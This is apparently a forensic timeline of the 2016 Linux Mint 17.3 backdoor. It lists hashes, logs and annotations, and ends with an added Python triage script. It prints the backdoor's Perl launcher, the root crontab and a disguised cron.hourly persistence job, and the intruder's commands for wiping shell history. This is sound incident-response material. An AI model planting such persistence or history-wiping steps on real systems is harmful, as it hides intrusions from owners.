eromang
Linux Mint 17.3 Cinnamon edition backdoor timeline

Feb 21st, 2016
* man.cy (MD5 9bc3f9009fcdad9a26c652eb8ef9a89f)

https://www.virustotal.com/en/file/b3b40059aa95d260b1c2df5a071cdc8b508c59ddcc75b88b11b94fb32dda35e0/analysis/
File named on the Linux Mint blog (http://blog.linuxmint.com/?p=2994), found in /var/lib/:
-rw-r--r-- 1 root root 35365 Feb 19 14:27 man.cy
https://gist.github.com/Oweoqi/31239851e5b84dbba894

* man (MD5 192ab4fb95b73dd3046362a36d6387e7)

https://www.virustotal.com/en/file/c29a12258d3383912fb9d2fc5d17651a2e606426dca729582ba8585a610bbb21/analysis/
In /var/lib/:
-rwxr-xr-x 1 root root 118 Feb 19 14:44 man

#!/usr/bin/perl
# Launcher for /var/lib/apt-cache, started by the root crontab and by man.sh.
# Crude single-instance check: the grep (and the shell running the pipeline)
# match their own command lines, so the output is never empty; anything
# longer than 300 bytes is taken to mean apt-cache is already running.
$ps = `ps aux | grep apt-cache`;
if(length($ps)>300) { die; } else {
system("/var/lib/apt-cache");
}

* apt-cache (MD5 d945f9b959f76afe24f3a804fe316806)

https://www.virustotal.com/en/file/b0134fe076b976d3fe1565385d15666bf3b68bd2a01718ef414dfa5c65365abb/analysis/
In /var/lib/:
-rwxr-xr-x 1 root root 31816 Feb 19 14:42 apt-cache

* /root/.bash_history

-rw------- 1 root root 73 Feb 19 14:45 /root/.bash_history

ls
rm -f man.c
rm -f /root/.bash_history
rm -f /root/.nano_history
exit

The clean-up defeated itself: bash writes its history to $HISTFILE when the shell exits, so the file was recreated after the rm and holds exactly the session that deleted it.

* /var/log/apt/history.log

Start-Date: 2016-02-19 13:30:11
Commandline: apt-get install build-essential
Install: libstdc++-4.8-dev:amd64 (4.8.4-2ubuntu1~14.04.1, automatic), dpkg-dev:amd64 (1.17.5ubuntu5.5, automatic), libc-dev-bin:amd64 (2.19-0ubuntu6.7, automatic), g++:amd64 (4.8.2-1ubuntu6, automatic), g++-4.8:amd64 (4.8.4-2ubuntu1~14.04.1, automatic), build-essential:amd64 (11.6ubuntu6), libc6-dev:amd64 (2.19-0ubuntu6.7, automatic)
Upgrade: libasan0:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libquadmath0:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), gcc-4.8-base:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), gcc-4.8-base:i386 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), cpp-4.8:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libgomp1:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libtsan0:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libc6:amd64 (2.19-0ubuntu6.6, 2.19-0ubuntu6.7), libc6:i386 (2.19-0ubuntu6.6, 2.19-0ubuntu6.7), libatomic1:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libgcc-4.8-dev:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libdpkg-perl:amd64 (1.17.5ubuntu5.4, 1.17.5ubuntu5.5), gcc-4.8:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libgfortran3:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libc6-dbg:amd64 (2.19-0ubuntu6.6, 2.19-0ubuntu6.7), libstdc++6:i386 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libstdc++6:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libitm1:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1)
End-Date: 2016-02-19 13:31:45

A compiler toolchain (gcc, g++, libc6-dev) was installed about an hour before apt-cache was written and man.c was deleted, consistent with the payload having been built on the box.

* /var/spool/cron/crontabs/root

156957 4 -rw------- 1 root crontab 1147 Feb 17 18:05 ./var/spool/cron/crontabs/root

Root crontab modified to run /var/lib/man daily and at every reboot (the two uncommented lines below). Note the one-hour gap between the "installed on" stamp inside the file and the listed mtime; reconcile the image's timezone with the analysis host's before ordering events.

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.VyGC8a/crontab installed on Wed Feb 17 17:05:35 2016)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#Common Examples:
@daily /var/lib/man
@reboot /var/lib/man
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command

* /etc/cron.hourly/man.sh

263158 4 -rw-r--r-- 1 root root 172 Feb 17 18:03 ./etc/cron.hourly/man.sh

A second launcher for /var/lib/man, dressed up as a Debian man-page maintenance job (the {full-name-debian-dev}/{email-debian-dev} placeholders in the header were never filled in). It would not actually fire from cron.hourly: run-parts skips files that are not executable (this one is mode 644) and, by default, files whose names contain a dot. Persistence therefore rests on the root crontab entries above.

#!/bin/sh
#
# Script to update all the man pages
#
# Written by {full-name-debian-dev} <{email-debian-dev}> for the Debian project.
#
cd "/var/lib/"
./man > /dev/null 2>&1
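Read chronologically, the listing above puts the persistence (cron.hourly/man.sh, the root crontab) on Feb 17 and the build-essential install, the three files in /var/lib and the history wipe on Feb 19. The following is an added triage script, not part of the original paste and not Linux Mint's own tooling: pointed at a mounted root filesystem it checks the paths above, compares MD5s with the ones listed, flags crontab lines that schedule /var/lib/man and merges file mtimes with /var/log/apt/history.log into one sorted timeline. The mount path, the function names and the build_fixture() tree (placeholder file bodies with the paste's timestamps) are assumptions made for this example.

```python
# Added example (not part of the original paste): triage a mounted Linux Mint
# root for the artifacts listed above. Paths are relative to a mount root such
# as /mnt/mint (an assumption); the MD5s are the ones given in the timeline.
import hashlib
import os
import re
import tempfile
from datetime import datetime

KNOWN_MD5 = {  # hashes from the paste, keyed by path under the mount root
    "var/lib/man.cy": "9bc3f9009fcdad9a26c652eb8ef9a89f",
    "var/lib/man": "192ab4fb95b73dd3046362a36d6387e7",
    "var/lib/apt-cache": "d945f9b959f76afe24f3a804fe316806",
}
# Artifacts listed without a hash; presence alone is reported for these.
ARTIFACTS = list(KNOWN_MD5) + ["etc/cron.hourly/man.sh",
                               "var/spool/cron/crontabs/root",
                               "root/.bash_history"]
CRON_IOC = re.compile(r"(^|\s)/var/lib/man(\s|$)")
APT_START = re.compile(r"^Start-Date: (\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)")
APT_CMD = re.compile(r"^Commandline: (.+)")

def check_artifacts(root):
    """Map each listed artifact present under root to (md5, status)."""
    found = {}
    for rel in ARTIFACTS:
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            continue
        with open(path, "rb") as f:
            digest = hashlib.md5(f.read()).hexdigest()
        if rel not in KNOWN_MD5:
            status = "present"
        elif digest == KNOWN_MD5[rel]:
            status = "md5-match"
        else:
            status = "present-md5-differs"
        found[rel] = (digest, status)
    return found

def cron_hits(crontab_text):
    """Uncommented crontab lines that schedule /var/lib/man."""
    return [ln for ln in crontab_text.splitlines()
            if not ln.lstrip().startswith("#") and CRON_IOC.search(ln)]

def apt_events(history_text):
    """(datetime, 'apt: <Commandline>') per transaction in apt's history.log."""
    events, started = [], None
    for ln in history_text.splitlines():
        m = APT_START.match(ln)
        if m:
            started = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            continue
        m = APT_CMD.match(ln)
        if m and started is not None:
            events.append((started, "apt: " + m.group(1)))
    return events

def timeline(root):
    """Artifact mtimes merged with apt history, oldest first."""
    events = []
    for rel, (digest, status) in check_artifacts(root).items():
        mtime = os.stat(os.path.join(root, rel)).st_mtime
        events.append((datetime.fromtimestamp(mtime), f"{rel} md5={digest} {status}"))
    apt_log = os.path.join(root, "var/log/apt/history.log")
    if os.path.isfile(apt_log):
        with open(apt_log, errors="replace") as f:
            events.extend(apt_events(f.read()))
    return sorted(events)

def build_fixture():
    """Constructed tree mirroring the listing above: placeholder bodies (so the
    MD5s will not match the real samples) with the mtimes from the paste."""
    root = tempfile.mkdtemp(prefix="mint-triage-")
    files = [
        ("etc/cron.hourly/man.sh", "2016-02-17 18:03", "#!/bin/sh\ncd \"/var/lib/\"\n./man > /dev/null 2>&1\n"),
        ("var/spool/cron/crontabs/root", "2016-02-17 18:05", "# m h dom mon dow command\n@daily /var/lib/man\n@reboot /var/lib/man\n# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/\n"),
        ("var/log/apt/history.log", "2016-02-19 13:31", "Start-Date: 2016-02-19 13:30:11\nCommandline: apt-get install build-essential\nEnd-Date: 2016-02-19 13:31:45\n"),
        ("var/lib/man.cy", "2016-02-19 14:27", "placeholder for the dropped source\n"),
        ("var/lib/apt-cache", "2016-02-19 14:42", "placeholder for the compiled payload\n"),
        ("var/lib/man", "2016-02-19 14:44", "#!/usr/bin/perl\nsystem(\"/var/lib/apt-cache\");\n"),
        ("root/.bash_history", "2016-02-19 14:45", "ls\nrm -f man.c\nrm -f /root/.bash_history\nexit\n"),
    ]
    for rel, stamp, body in files:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write(body)
        ts = datetime.strptime(stamp, "%Y-%m-%d %H:%M").timestamp()
        os.utime(path, (ts, ts))
    return root

if __name__ == "__main__":
    root = build_fixture()  # replace with the real mount root, e.g. "/mnt/mint"
    for when, what in timeline(root):
        print(when.strftime("%Y-%m-%d %H:%M:%S"), what)
    with open(os.path.join(root, "var/spool/cron/crontabs/root")) as f:
        print("crontab IOC lines:", cron_hits(f.read()))
```

Against a real image (mounted read-only, loop or otherwise), pass the mount root instead of the fixture. An md5-match identifies the exact samples from the paste; a present-md5-differs result on /var/lib/man or apt-cache still deserves a look, since a payload rebuilt with the same toolchain would carry a different hash. As noted above, check the image's timezone against the analysis host's before trusting the order of events that are only an hour apart.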